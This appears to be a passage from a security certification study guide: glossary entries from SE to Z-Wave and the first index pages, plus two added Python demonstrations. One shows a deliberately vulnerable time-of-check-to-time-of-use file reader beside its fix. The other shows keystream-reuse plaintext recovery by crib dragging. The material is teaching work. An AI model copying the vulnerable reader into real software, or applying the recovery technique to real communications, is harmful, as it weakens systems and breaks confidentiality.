SE (secure erase) A method of sanitizing a drive using the ATA command set.

SEAndroid (Security-Enhanced Android) Since version 4.3, Android has been based on Security-Enhanced Linux, enabling granular permissions for apps, container isolation, and storage segmentation.

SECaaS (Security as a Service) A computing method that enables clients to take advantage of information, software, infrastructure, and processes provided by a cloud vendor in the specific area of computer security.

secure boot A UEFI feature that prevents unwanted processes from executing during the boot operation.

security control A technology or procedure put in place to mitigate vulnerabilities and risk and to ensure the confidentiality, integrity, and availability (CIA) of information.

SED (self-encrypting drive) A disk drive where the controller can automatically encrypt data that is written to it.

segment A portion of a network where all attached hosts can communicate freely with one another.

SEH (structured exception handler) A mechanism to account for unexpected error conditions that might arise during code execution. Effective error handling reduces the chances that a program could be exploited.

self-signed certificate A digital certificate that has been signed by the entity that issued it, rather than by a CA.

sentiment analysis Devising an AI/ML algorithm that can describe or classify the intention expressed in natural language statements.

separation of duties A concept that states that duties and responsibilities should be divided among individuals to prevent ethical conflicts or abuse of powers.

server certificate A digital certificate that guarantees the identity of e-commerce sites and other websites that gather and store confidential information.

serverless A software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances.

server-side In a web application, input data that is executed or validated as part of a script or process running on the server.

service account A host or network account that is designed to run a background service, rather than to log on interactively.

session affinity A scheduling approach used by load balancers to route traffic to devices that have already established connections with the client in question. Also known as source IP affinity.

session hijacking A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address.

sFlow Web standard for using sampling to record network traffic statistics.

G-22 | Glossary

SFTP (Secure File Transfer Protocol) A secure version of the File Transfer Protocol that uses a Secure Shell tunnel as an encryption method to transfer, access, and manage files.

SHA (Secure Hash Algorithm) A cryptographic hashing algorithm created to address possible weaknesses in MD5. The current version is SHA-2.

shadow IT Computer hardware, software, or services used on a private network without authorization from the system owner.

shared account An account with no credential (guest) or one where the credential is known to multiple persons.

shellcode Lightweight block of malicious code that exploits a software vulnerability to gain initial access to a victim system.

shimming The process of developing and implementing additional code between an application and the operating system to enable functionality that would otherwise be unavailable.

shoulder surfing A social engineering tactic to obtain someone's password or PIN by observing him or her as he or she types it in.

SID (security identifier) The value assigned to an account by Windows and that is used by the operating system to identify that account.

SIEM (security information and event management) A solution that provides real-time or near-real-time analysis of security alerts generated by network hardware and applications.

signature-based detection A network monitoring system that uses a predefined set of rules provided by a software vendor or security personnel to identify events that are unacceptable.

SIM (subscriber identity module) A small chip card that identifies the user and phone number of a mobile device, via an International Mobile Subscriber Identity (IMSI).

sinkhole A DoS attack mitigation strategy that directs the traffic that is flooding a target IP address to a different network for analysis.

SIP (Session Initiation Protocol) Used to establish, disestablish, and manage VoIP and conferencing communications sessions. It handles user discovery (locating a user on the network), availability advertising (whether a user is prepared to receive calls), negotiating session parameters (such as use of audio/video), and session management and termination.

SLA (service level agreement) Operating procedures and standards for a service contract.

SLE (single loss expectancy) The amount that would be lost in a single occurrence of a particular risk factor.

smart card A device similar to a credit card that can store authentication information, such as a user's private key, on an embedded microchip.

smart meter A utility meter that can submit readings to the supplier without user intervention.

SMiShing A form of phishing that uses SMS text messages to trick a victim into revealing information.

sn1per Software utility designed for penetration testing reporting and evidence gathering that can also run automated test suites.

SNMP (Simple Network Management Protocol) Protocol for monitoring and managing network devices. SNMP works over UDP ports 161 and 162 by default.

SOA (service-oriented architecture) A software architecture where components of the solution are conceived as loosely coupled services not dependent on a single platform type or technology.

SOAP (Simple Object Access Protocol) An XML-based web services protocol that is used to exchange messages.

SOAR (security orchestration, automation, and response) A class of security tools that facilitates incident response, threat hunting, and security configuration by orchestrating automated runbooks and delivering data enrichment.

SoC (system-on-chip) A processor that integrates the platform functionality of multiple logical controllers onto a single chip.

Glossary | G-23

spear phishing An email-based or web-based form of phishing which targets specific individuals.

SPIM (spam over internet messaging) A spam attack that is propagated through instant messaging rather than email.

split tunnel VPN configuration where only traffic for the private network is routed via the VPN gateway.

SPoF (single point of failure) A component or system that would cause a complete interruption of a service if it failed.

SQL injection (Structured Query Language injection) An attack that injects a database query into the input data directed at a server by accessing the client side of the application.

SSAE SOC (Statements on Standards for Attestation Engagements Service Organization Control) Audit specifications designed to ensure that cloud hosting providers meet professional standards. A SOC2 Type II report is created for a restricted audience, while SOC3 reports are provided for general consumption.

SSH (Secure Shell) A remote administration and file copy program that supports VPNs by using port forwarding, and that runs on TCP port 22.

SSID (service set identifier) A character string that identifies a particular wireless LAN (WLAN).

SSO (single sign-on) An authentication technology that enables a user to authenticate once and receive authorizations for multiple services.

SSTP (Secure Socket Tunneling Protocol) A protocol that uses the HTTP over SSL protocol and encapsulates an IP packet with a PPP header and then with an SSTP header.

standard naming convention Applying consistent names and labels to assets and digital resources/identities within a configuration management system.

stapling Mechanism used to mitigate performance and privacy issues when requesting certificate status from an OCSP responder.

state actor A type of threat actor that is supported by the resources of its host country's military and security services. Also known as nation state actor.

state table Information about sessions between hosts that is gathered by a stateful firewall.

stateful inspection A technique used in firewalls to analyze packets down to the application layer rather than filtering packets only by header information, enabling the firewall to enforce tighter security.

steganography A technique for obscuring the presence of a message, often by embedding information within a file or other entity.

STIX (Structured Threat Information eXpression) A framework for analyzing cybersecurity incidents.

stored procedure One of a set of pre-compiled database statements that can be used to validate input to a database.

STP (Spanning Tree Protocol) A switching protocol that prevents network loops by dynamically disabling links as needed.

stream cipher A type of symmetric encryption that combines a stream of plaintext bits or bytes with a pseudorandom stream initialized by a secret key.

stress test A software testing method that evaluates how software performs under extreme load.

supplicant In EAP architecture, the device requesting access to the network.

SWG (secure web gateway) An appliance or proxy server that mediates client connections with the Internet by filtering spam and malware and enforcing access restrictions on types of sites visited, time spent, and bandwidth consumed.

symmetric encryption A two-way encryption scheme in which encryption and decryption are both performed by the same key. Also known as shared-key encryption.

syslog A protocol enabling different appliances and software applications to transmit logs or event records to a central server.

G-24 | Glossary

TACACS+ (Terminal Access Controller Access Control System Plus): An AAA protocol developed by Cisco that is often used to authenticate to administrator accounts for network appliance management.

tail command: Linux utility for showing the last lines in a file.

tailgating: Social engineering technique to gain access to a building by following someone who is unaware of their presence.

TAP (test access port): A hardware device inserted into a cable to copy frames for analysis.

tape: Tape media provides robust, high-speed, high-capacity backup storage. Tape drives and autoloader libraries can be connected to the SATA and SAS buses or accessed via a SAN.

TAXII (Trusted Automated eXchange of Indicator Information): A protocol for supplying codified information to automate incident detection and analysis.

tcpdump command: A command-line packet sniffing utility.

tcpreplay command: A command-line utility that replays packets saved to a file back through a network adapter.

technical control: A category of security control that is implemented as a system (hardware, software, or firmware). Technical controls may also be described as logical controls.

tethering: Using the cellular data plan of a mobile device to provide Internet access to a laptop or PC. The PC can be tethered to the mobile by USB, Bluetooth, or Wi-Fi (a mobile hotspot). Also known as hotspot.

theHarvester: Utility for gathering results from open source intelligence queries.

thin AP: An access point that requires a wireless controller in order to function.

third-party risks: Vulnerabilities that arise from dependencies in business relationships with suppliers and customers.

threat actor: The person or entity responsible for an event that has been identified as a security incident or as a risk.

threat hunting: Cybersecurity technique designed to detect the presence of threats that have not been discovered by normal security monitoring.

threat map: Animated map showing threat sources in near real time.

time of day restrictions: Policies or configuration settings that limit a user's access to resources.

time offset: In forensics, identifying whether a time zone offset has been applied to a file's time stamp.

timeline: In digital forensics, a tool that shows the sequence of file system events within a source image in a graphical format.

TKIP (Temporal Key Integrity Protocol): A mechanism used in the first version of WPA to improve the security of wireless encryption mechanisms, compared to the flawed WEP standard.

TLS (Transport Layer Security): A security protocol that uses certificates for authentication and encryption to protect web communication.

TOCTTOU (time of check to time of use): The potential vulnerability that occurs when there is a change between when an app checked a resource and when the app used the resource.

token: A physical or virtual item that contains authentication and/or authorization data, commonly used in multifactor authentication.

tokenization: A deidentification method where a unique token is substituted for real data.

TOTP (Time-based One-time Password): An improvement on HOTP that forces one-time passwords to expire after a short period of time.

TPM (Trusted Platform Module): A specification for hardware-based storage of digital certificates, keys, hashed passwords, and other user and platform identification information.

transit gateway: In cloud computing, a virtual router deployed to facilitate connections between VPC subnets and VPN gateways.
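The TOCTTOU entry describes the window between a check and a use. The following added example (not from the guide) makes that race concrete on a POSIX file system. `vulnerable_read` checks a path name and then reopens the same name, so an attacker who swaps the name for a symbolic link inside that window gets the check applied to one file and the read applied to another. `safe_read` opens first with O_NOFOLLOW and validates the descriptor it actually holds with fstat, so the same swap has no effect, and a name that is already a symlink is refused at open time. The file names, contents and the `attacker_hook` callback that stands in for the attacker's concurrent action are constructed for the demonstration; O_NOFOLLOW is a POSIX flag and is absent on Windows.

```python
import os
import stat
import tempfile

def vulnerable_read(path: str, attacker_hook=None) -> bytes:
    """Check-then-use on a path name: the name is resolved twice."""
    st = os.lstat(path)                                   # time of CHECK
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("refusing non-regular file")
    if attacker_hook is not None:
        attacker_hook()                                   # simulated race window
    with open(path, "rb") as f:                           # time of USE: name resolved again
        return f.read()

def safe_read(path: str, attacker_hook=None) -> bytes:
    """Open first, then validate the object behind the descriptor."""
    flags = os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)    # O_NOFOLLOW refuses symlinks atomically
    try:
        fd = os.open(path, flags)                         # the only name resolution
    except OSError as exc:                                # ELOOP when the name is a symlink
        raise PermissionError(f"refusing to open {path}: {exc.strerror}") from exc
    try:
        st = os.fstat(fd)                                 # CHECK the descriptor, not the name
        if not stat.S_ISREG(st.st_mode):
            raise PermissionError("refusing non-regular file")
        if attacker_hook is not None:
            attacker_hook()                               # same window: the name no longer matters
        chunks = []
        while True:
            chunk = os.read(fd, 65536)
            if not chunk:
                break
            chunks.append(chunk)
        return b"".join(chunks)
    finally:
        os.close(fd)

def demo() -> tuple:
    """Return (bytes the vulnerable reader leaked, bytes the safe reader read,
    whether the safe reader refused the swapped name)."""
    with tempfile.TemporaryDirectory() as d:
        secret = os.path.join(d, "secret.txt")            # constructed files
        public = os.path.join(d, "public.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")

        def reset_public():
            if os.path.lexists(public):
                os.remove(public)
            with open(public, "wb") as f:
                f.write(b"public data")

        def swap():                                       # attacker: replace public.txt with a symlink
            os.remove(public)
            os.symlink(secret, public)

        reset_public()
        leaked = vulnerable_read(public, attacker_hook=swap)
        reset_public()
        read_safely = safe_read(public, attacker_hook=swap)
        try:
            safe_read(public)                             # the name is now the attacker's symlink
            refused = False
        except PermissionError:
            refused = True
        return leaked, read_safely, refused

if __name__ == "__main__":
    print(demo())
```

The fix is not "check faster"; it is to stop naming the resource twice. Every check that matters is done against the file descriptor, which is bound to one inode for its lifetime, so nothing the attacker does to the directory entry afterwards changes what gets read.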


trend analysis: The process of detecting patterns within a dataset over time, and using those patterns to make predictions about future events or better understand past events.

Trojan: A malicious software program hidden within an innocuous-seeming piece of software. Usually, the Trojan is used to try to compromise the security of the target computer. Also known as Trojan horse.

TTP (tactics, techniques, and procedures): Analysis of historical cyber-attacks and adversary actions.

typosquatting: An attack in which an attacker registers a domain name with a common misspelling of an existing domain, so that a user who misspells a URL they enter into a browser is taken to the attacker's website. Also known as URL hijacking.

UEBA (user and entity behavior analytics): A system that can provide automated identification of suspicious activity by user accounts and computer hosts.

unified endpoint management: Enterprise software for controlling device settings, apps, and corporate data storage on all types of fixed, mobile, and IoT computing devices.

USB data blocker (Universal Serial Bus data blocker): Hardware plug to prevent malicious data transfer when a device is plugged into a USB charging point.

UTM (unified threat management): All-in-one security appliances and agents that combine the functions of a firewall, malware scanner, intrusion detection, vulnerability scanner, data loss prevention, content filtering, and so on.

vault: A secure room with walls and gateway hardened against physical assault.

VBA (Visual Basic for Applications): Programming language used to implement macros and scripting in Office document automation.

VDE (virtual desktop environment): The user desktop and software applications provisioned as an instance under VDI.

VDI (virtual desktop infrastructure): A virtualization implementation that separates the personal computing environment from a user's physical computer.

vendor management: Policies and procedures to identify vulnerabilities and ensure security of the supply chain.

virus: Code designed to infect computer files or disks when it is activated.

vishing: A human-based attack where the attacker extracts information while speaking over the phone or leveraging IP-based voice messaging services (VoIP).

VLAN (virtual local area network): A logically separate network, created by using switching technology. Even though hosts on two VLANs may be physically connected to the same cabling, local traffic is isolated to each VLAN, so they must use a router to communicate.

VM escaping (virtual machine escaping): An attack where malware running in a VM is able to interact directly with the hypervisor or host kernel.

VM sprawl (virtual machine sprawl): Configuration vulnerability where provisioning and deprovisioning of virtual assets is not properly authorized and monitored.

VPC (virtual private cloud): A private network segment made available to a single cloud consumer on a public cloud.

VPN (virtual private network): A secure tunnel created between two endpoints connected via an unsecure network (typically the Internet).

vulnerability: A weakness that could be triggered accidentally or exploited intentionally to cause a security breach.

vulnerability assessment: An evaluation of a system's security and ability to meet compliance requirements based on the configuration state of the system, as represented by information collected from the system.

WAF (web application firewall): A firewall designed specifically to protect software running on web servers and their backend databases from code injection and DoS attacks.


war driving: The practice of using a Wi-Fi sniffer to detect LANs and then either making use of them (if they are open/unsecured) or trying to break into them (using WEP and WPA cracking tools).

warm site: A location that is dormant or performs noncritical functions under normal conditions, but which can be rapidly converted to a key operations site if needed.

watering hole attack: An attack in which an attacker targets specific groups or organizations, discovers which websites they frequent, and injects malicious code into those sites.

WEP (Wired Equivalent Privacy): A legacy mechanism for encrypting data sent over a wireless connection.

whaling: An email-based or web-based form of phishing which targets senior executives or wealthy individuals.

white team: Staff administering, evaluating, and supervising a penetration test or incident response exercise.

WinHex: Forensics tool for Windows that allows collection and inspection of binary code in disk and memory images.

worm: A type of malware that replicates in system memory and can spread over network connections rather than infecting files.

WPA (Wi-Fi Protected Access): Standards for authenticating and encrypting access to Wi-Fi networks. Also known as WPA2, WPA3.

WPS (Wi-Fi Protected Setup): A feature of WPA and WPA2 that allows enrollment in a wireless network based on an 8-digit PIN.

XaaS (anything as a service): Expressing the concept that most types of IT requirements can be deployed as a cloud service model.

XML injection: Attack method where malicious XML is passed as input to exploit a vulnerability in the target app.

XOR (exclusive OR): An operation that outputs true only if one input is true and the other input is false.

XSRF (cross-site request forgery): A malicious script hosted on the attacker's site that can exploit a session started on another site in the same browser. Also known as client-side request forgery or CSRF.

XSS (cross-site scripting): A malicious script hosted on the attacker's site or coded in a link injected onto a trusted site, designed to compromise clients browsing the trusted site, circumventing the browser's security model of trusted zones.

zero trust: Security design paradigm where any request (host-to-host or container-to-container) must be authenticated before being allowed.

zero-day: A vulnerability in software that is unpatched by the developer, or an attack that exploits such a vulnerability.

zero fill: A method of sanitizing a drive by setting all bits to zero.

ZigBee: Low-power wireless communications open source protocol used primarily for home automation. ZigBee uses radio frequencies in the 2.4 GHz band and a mesh topology.

Z-Wave: Low-power wireless communications protocol used primarily for home automation. Z-Wave uses radio frequencies in the high 800 to low 900 MHz band and a mesh topology.
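The XOR entry gives the truth table. The following added example (mine, not the guide's) shows why the operation matters for the symmetric encryption defined earlier in this glossary: XOR with a keystream is its own inverse, so a single function both encrypts and decrypts with the same key, and reusing that keystream for two messages cancels the key and exposes p1 XOR p2, from which a known fragment of one plaintext (a crib) recovers the other at the same offset. The plaintexts and the random keystream are constructed for the demonstration.

```python
import os

def xor(a: bool, b: bool) -> bool:
    """Exclusive OR on two bits: true only when exactly one input is true."""
    return a != b

def xor_bytes(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("inputs must have equal length")
    return bytes(x ^ y for x, y in zip(a, b))

def stream_encrypt(plaintext: bytes, keystream: bytes) -> bytes:
    """XOR with a keystream. Symmetric: applying it again with the same keystream decrypts."""
    return xor_bytes(plaintext, keystream)

stream_decrypt = stream_encrypt                      # same key, same operation

def keystream_reuse_leak(c1: bytes, c2: bytes) -> bytes:
    """With a shared keystream k: (p1 ^ k) ^ (p2 ^ k) == p1 ^ p2. The key cancels out."""
    return xor_bytes(c1, c2)

def crib_drag(p1_xor_p2: bytes, crib: bytes, offset: int) -> bytes:
    """If `crib` is what one plaintext says at `offset`, this is what the other says there."""
    return xor_bytes(p1_xor_p2[offset:offset + len(crib)], crib)

def demo() -> dict:
    keystream = os.urandom(16)                       # fresh random keystream (constructed)
    p1 = b"attack at dawn!!"                         # constructed 16-byte messages
    p2 = b"retreat at dusk!"
    c1 = stream_encrypt(p1, keystream)
    c2 = stream_encrypt(p2, keystream)               # the mistake: keystream reused
    leak = keystream_reuse_leak(c1, c2)
    return {
        "roundtrip_ok": stream_decrypt(c1, keystream) == p1,
        "ciphertexts_differ": c1 != c2,
        "leak_is_plaintext_xor": leak == xor_bytes(p1, p2),
        "recovered_from_crib": crib_drag(leak, b"attack", 0),   # reveals p2[0:6]
    }

if __name__ == "__main__":
    print(demo())
```

The same failure applies to any stream cipher or counter-mode block cipher, because all of them reduce to XOR with a keystream; the practical rule is that a key and nonce pair is used for exactly one message.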

Index
Page numbers with Italics represent charts, graphs, and diagrams.

A

A/A (active/active) clustering, 251
AAA. see authentication, authorization, and accounting (AAA)
ABAC (attribute-based access control), 201
abnormal process behavior analysis, 90-91
academic journals, threat research sources, 28
acceptable use policy (AUP), 208
access, network architecture, 217
access control entry (ACE), 200-201
access control lists (ACL)
  egress traffic filtering, 256
  firewall rulesets, 262-263
  ingress traffic filtering, 256
  reverse proxy servers, 262-263
  top-to-bottom processing, 262-263
access points, 235, 469
access policies, 191-192
account attributes, 191
account audits, 194
account expiration, 197
accounting
  identity and access management (IAM), 148-149
  physical access controls, 540
account lockout and disablement, 196-197
account management controls. see identity and account management controls
account permissions, 195
account policies
  access policies, 191-192
  account attributes, 191
  account audits, 194
  account lockout and disablement, 196-197
  account password policy settings, 192-193
  account permissions, 195
  account restrictions, 193-194
  system-enforced account policies, 192-193
  usage audits, 195-196
account restrictions
  geolocation, 193
  location-based policies, 193
  time-based restrictions
    impossible travel time/risky login policy, 194
    time-based login policy, 193-194
    time of day policy, 193
ACE (access control entry), 200-201
ACI (adjacent channel interference), 236
ACL. see access control lists (ACL)
Acronis Backup, 523, 525
actions on objectives, pen test attack life cycle, 70
active (intrusive) vulnerability scanner, 60
active/active (A/A) clustering, 251
active defenses, 534-535
active/passive (A/P) clustering, 251
active reconnaissance
  drones/unmanned aerial vehicles (UAV), 69-70
  footprinting, 69
  Open Source Intelligence (OSINT), 69
  social engineering, 69
  war driving, 69
Additional Data (AEAD) mode, 109
Address Resolution Protocol (ARP)
  poisoning attacks, 228
  routing and switching protocols, 218-219
Address Resolution Protocol (ARP) cache, 37
ad hoc network, 357
adjacent channel interference (ACI), 236
administrator credential policies, 185
administrator/root accounts
  administrator credential policies, 185
  default security groups, 185
  generic administrator account management, 185
admissibility in digital forensics, 484
Adobe
  rights management services, 450
  software vulnerabilities, 50
Advanced Encryption Standard (AES), 100, 237
Advanced Forensic Format (AFF), 493
advanced persistent threat (APT)
  defined, 20-21
  fileless malware, 85
advanced volatile threat (AVT), fileless malware, 85
adversarial artificial intelligence, 480
adware, 85
AEAD (Additional Data) mode, 109
AES (Advanced Encryption Standard), 100
AES (Advanced Encryption Standard) cipher, 237
AES Galois Counter Mode Protocol (GCMP), 238
aggregation/banding technique, 452


agile development software development life cycle (SDLC), 400, 401-403
AH (Authentication Header), 305
AI. see artificial intelligence (AI)
AICPA, 11-12
air gap (system isolation), 475
air gapped host, 548-549
AirWatch, 345
AIS (Automated Indicator Service), 30
alarm systems and sensors, 543-544
allow list, 393
Alternate Data Streams (ADS), 495
Always-on VPN, 308-309
Amazon
  App store, 346
  Elastic Compute Cloud, 409, 410
  Web Services (AWS)
    Lambda, 41
    Pacu exploitation framework, 46
    PrivateLink, 424
    security credentials, 188
    security group management, 425-426
American Institute of Certified Public Accountants (AICPA), 11-12
amplification attack, 247-248
analysis phase, 465-466
Android
  Beam, 359
  data encryption, 350
  enterprise mobility management (EMM), 346-348
  Enterprise program, 346
  locking down connectivity methods, 357
  Obad Android Trojan malware, 359
  rooting, 353-354
  USB connection methods, 360
annualized rate of occurrence (ARO), 503
annual loss expectancy (ALE), 503
anomaly analysis, 90
anomaly-based detection, 271
Anonymous, 20
Ansible cloud orchestration platform, 430
anti-forensics, 492-493
anti-malware software
  endpoint protection, 327
  threat intelligence sources, 25
anti-virus response, 329
anti-virus software (A-V)
  endpoint protection, 327
  malware, 90
anything as a service (XaaS), 409-410
A/P (active/passive) clustering, 251
Apache, penetration testing, 70
APIs. see application programming interfaces (APIs)
Apple
  Apple Pay, 360
  Business Manager, 352
  GoTo bug, 385
  iOS
    data encryption, 350
    enterprise mobility management, 346
    jailbreaking, 353-354
  macOS
    DarkMatter, 88
    QuarkMatter, 88
  Push Notification Service, 361
appliance firewall, bridged (layer 2) and routed (layer 3), 259
application allow and block lists, 478-479
application scanners, 59
application attack, indicators
  DLL injection, 369
  driver manipulation, 369
  memory leak, 368-369
  null pointer dereference, 368
  overflow vulnerabilities, 367-368
  pass the hash (PtH) attack, 369-370
  privilege escalation, 366-367
  race conditions, 368
  resource exhaustion, 368-369
  secure network designs, 247
application aware firewalls, 258
application-based firewalls, 260
application clustering, 251
application development, deployment, and automation, 399
application firewall, 260
application layer (OSI Layer 7), 258, 425
application log files
  DNS event logs, 470
  dump files, 471
  VoIP, call managers, SIP traffic, 471
  web/HTTP access logs, 470
application management, 352-353
application programming interfaces (APIs)
  attacks, 374
  CASB (cloud access security broker), 427
  cloud security controls, 419
  identity and account management controls, 187
  inspection and integrations, 420-421
  northbound, 432
  Representational State Transfer (REST), 430
  secure application protocols, 294-295
  service integration, 430
  Simple Object Access Protocol (SOAP), 430
  southbound, 432
application security, 419
application servers, 13
application virtualization, 413-414
AppLocker, 394
APT (advanced persistent threat), 85
arbitrary code execution, 366
Arduino, 332
Argus, 473
ARP (Address Resolution Protocol), 37, 218-219, 228
artifacts and data recovery, 495
artificial intelligence (AI)
  adversarial, 480
  cyber threat intelligence (CTI), 26


  physical site security controls, 545
  threat intelligence sources
    artificial neural network (ANN), 31
    machine learning (ML) techniques, 31
    predictive analysis, 31
artificial neural network (ANN), 31
ASCII characters, 373
asset allocation, onboarding policies, 181
asset identification, 531
asset management
  asset identification and standard naming conventions, 531
  internet protocol (IP) schema, 531
  IP address management (IPAM), 531
asset redundancy, 510
asset types, 510
asymmetric encryption
  cryptographic concepts, 96
  elliptic curve cryptography (ECC)
    Digital Signature Algorithm (DSA), 105
    public key cryptography algorithms, 102
  public and private key pairs, 100-101
  public key cryptography algorithms
    cryptographic concepts, 101-102
    RSA algorithm, 101, 104-105
    trapdoor function, 101
asynchronous replication, 520
AT&T Security, open source intelligence (OSINT), 27
attack life cycle, penetration testing, 70
attack profile, black, gray, and white box, 68
attack surface, 22-23
attack vectors
  cloud services, 23
  direct access, 22
  email, 23
  remote access, 23
  removable media, 22-23
  social media sites, 23
  supply chain, 23
  web, 23
  wireless access points (WAP), 23
attestation, identity provider (IdP), 203-204
attribute-based access control (ABAC), 201
attributes, of authentication design concepts, 152
auditing cloud security, 418-419
AUP (acceptable use policy), 208
authenticated encryption, 109
authentication
  cryptographic use cases,111-112
  identity and access management (IAM), 148-149
authentication, authorization, and accounting (AAA)
  enterprise/IEEE 802.1X authentication, 240
  identity and access management (IAM), 149
authentication attributes, 152
authentication controls
  authentication design concepts
    attributes of, 152
    authentication design, 151
    authentication factors, 150-151
    identity and access management (IAM), 148-149
    multifactor authentication (MFA), 151
  authentication technology
    extensible authentication Protocol (EAP), 165-166
    IEEE 802.1x port-based NAC (PNAC), 166
    key management devices, 164-165
    open authentication, 168-169
    remote authentication dial-in user service (RADIUS), 166-167
    smart-card authentication, 164
    terminal access controller access-control system (TACACS+), 167
    token keys and static codes, 167-168
    two-step verification, 170
  biometric authentication concepts
    behavioral technologies, 174-175
    establishing, 172-173
    facial recognition, 174
    fingerprint recognition, 173
  bluetooth connection methods, 358
  implementation guidelines, 177
  knowledge-based authentication
    authentication management, 161-162
    brute force attacks, 160
    Challenge Handshake Authentication Protocol (CHAP), 158
    dictionary attacks, 160
    hybrid password attacks, 160
    Kerberos authentication, 155-156
    Kerberos authorization, 156-157
    local authentication, 154
    MS-CHAP, 158
    network authentication, 154
    password attacks, 159-160
    Password Authentication Protocol (PAP), 157-158
    password crackers, 161
    passwords, resetting, 154
    personal identification number (PIN), 154
    rainbow table attacks, 160
    remote authentication, 154


    Windows authentication, 154-155
  physical access controls, 540
authentication design, confidentiality, integrity, availability (CIA) triad, 151
authentication design concepts
  attributes of, 152
  authentication design, 151
  authentication factors, 150-151
  identity and access management (IAM), 148-149
  multifactor authentication (MFA), 151
authentication factors
  logon factors, 150
  ownership factor, 150-151
  Something You Are Authentication, 151
  Something You Do Authentication, 151
  Something You Have Authentication, 150-151
  Something You Know Authentication, 150
Authentication Header (AH), 305
authentication logs, 470
authentication management, 161-162
authentication provider, 154
Authentication Service, Kerberos authentication, 155-156
authentication technology
  extensible authentication Protocol (EAP), 165-166
  IEEE 802.1x port-based NAC (PNAC), 166
  key management devices, 164-165
  open authentication, 168-169
  remote authentication dial-in user service (RADIUS), 166-167
  smart-card authentication, 164
  terminal access controller access-control system (TACACS+), 167
  token keys and static codes, 167-168
  two-step verification, 170
authorization
  creep, 195
  identity and access management (IAM), 148-149
authorization solutions
  attribute-based access control (ABAC), 201
  directory services, 202-203
  discretionary access control (DAC), 199
  federation and attestation, 203-204
  file system permissions, 200-201
  mandatory access control (MAC), 201
  Open Authorization (OAuth) protocols, 205-206
  Open ID Connect (OIDC), 206
  physical access controls, 540
  role-based access control (RBAC), 199
  rule-based access control, 201-202
  security assertions markup language (SAML), 204-205
Automated Indicator Service (AIS), threat data feeds, 30
automated vulnerability scanning
  patch management, 326-327
  vulnerability feed, 59
automation concepts, 399
automation courses of action, 402-403
automation/scripting release paradigms
  automation courses of action, 402-403
  continuous delivery, 402
  continuous deployment, 402
  continuous integration (CI), 402
  continuous monitoring, 402-403
  continuous validation, 403
Autopsy, 487, 491, 495
A-V (anti-virus software), 90
availability loss, impact of, 53
avoidance, of risks, 504
AVT (advanced volatile threat), 85
AWS (Amazon Web Services), 46, 188

B

backdoors, 86-87
background checks, 181
backup media types
  cloud backups, 527
  digital tape systems, 527
  disk, 527
  network attached storage (NAS), 527
  storage area networks (SANs), 527
backup power generator, 517
backups and retention policy, 522-523
backup storage issues, 526
backup strategies
  backup media types, 526-527
  backups and retention policy, 522-523
  backup storage issues, 526
  copy backups, 525
  differential backups, 524-525
  full backups, 524
  incremental backups, 524-525
  non-persistence environment, 528
  order of restoration, 527-528
  snapshots and images, 525-526
BadUSB, 321
bandwidth monitor, 473
"bare metal" hypervisor, 412
Barracuda firewall, 266, 419
barricades security, 541
baseband radio, 333
baseline configuration and registry setting, 326, 530-531
battery backups, 517
behavioral-based authentication, 152
behavioral-based detection, 271
behavioral technologies
  gait analysis, 175
  signature recognition, 175
  voice recognition, 175
behavioral threat research, threat intelligence providers, 26
benchmarks, for cybersecurity, 12


Berkeley Internet Name Domain (BIND), 287
BGP (Border Gateway Protocol), 219
binary packages, 386
binary Python process, 392
binary shellcode, 395
BIND (Berkeley Internet Name Domain), 287
biometric authentication concepts
  behavioral technologies, 174-175
  Crossover Error Rate (CER), 172-173
  establishing, 172-173
  facial recognition, 174
  Failure to Enroll Rate (FER), 173
  False Acceptance Rate (FAR), 172
  False Rejection Rate (FRR), 172
  fingerprint recognition, 173
  vascular biometrics, 173
  vein matching scanners, 173
biometric factor, 151
biometric identification, 175
biometric locks, 542
birthday attacks, cryptographic attacks, 117-118
BitLocker, 321
black box, 68
black hat hacker, 20
black hole, 475
blackouts, 517
blockchain, 121
blockchain-based IAM, 534
block ciphers, 100
block list, 393
BlueBorne exploit, 358
Blue Coat, 426
bluejacking, 359
bluesnarfing, 359
blue team, penetration testing, 68-69
bluetooth connection methods, 358-359
boot attestation, 320
boot integrity, 319-320
boot virus, 83
Border Gateway Protocol (BGP), 219
botnets
  cryptojacking, 89
  remote access Trojans (RATs), 86-87
  static known threats, 19
bots, remote access Trojans (RATs), 86-87
Bourne Again Shell (Bash) malicious indicators, 396
BPDU (Bridge Protocol Data Unit) Guard, 230
branching statements
  Python, 392
  scripting, 390
bridged appliance firewall, 259
Bridge Protocol Data Unit (BPDU) Guard, 230
Bring Your Own Device (BYOD), 344
bring-your-own-device (BYOD)
  call detail records (CDRs), 472
  evidence acquisition, 490
Bro (Zeek Network Monitor), 60, 268
brownouts, 517
Browser Exploitation frameworks (BeEF), 397
browser exploitation frameworks, exploitation frameworks, 46
brute force attacks, 160, 239
buffer overflow, 367
bug bounty, 20, 30, 68
building automation systems (BAS), 336
bulk data encryption, 112
bulk encryption, 105-106
burning documents, 552
business continuity plan (BCP), 463, 508
business impact analysis (BIA)
  business continuity plan (BCP), 508
  continuity of operation planning (COOP), 508
  defined, 508
  disaster recovery plans (DRPs), 512
  disasters, 511
  functional recovery plans, 512
  identification of critical systems, 510
  mean time between failures (MTBF), 510
  mean time to failure (MTTF), 510
  mean time to repair (MTTR), 511
  mission essential functions (MEF), 508-510
  risk management process, 500
  single points of failure (SPoF), 510-511
  site risk assessment, 511
  see also risk management
business partnership agreement (BPA), 323
business process analysis (BPA), 510
business risk management
  cybersecurity assurance, 8-10
  information assurance, 8-10
business workflows, network architecture, 217
BYOD. see Bring Your Own Device (BYOD)

C

C2. see command and control (C2)
CA. see certificate authority (CA)
cable locks, 543
Cache Control, 385
cache data acquisition, 495
caching engines, 261
Caesarian cipher, 98
California Consumer Privacy Act (CCPA), 14
call detail records (CDRs), 472
call list, 458
call managers, 471
Cambium Networks Wi-Fi Inspector, 244
camera/microphone enforcement, 351
camera security, 544-545
CAN buses, 338
canonicalization attack, 379
capabilities, of threat actors, 19
captive portals, 239-240
capture the flag (CTF), 210-211
card cloning, 543
card verification value (CVV), 442


carving, files, 495
CASB (cloud access security broker), 272
cat command, 278
CBC. see cipher block chaining (CBC) mode
CBC (cipher block chaining) mode, 108
CBT (computer-based training), 211
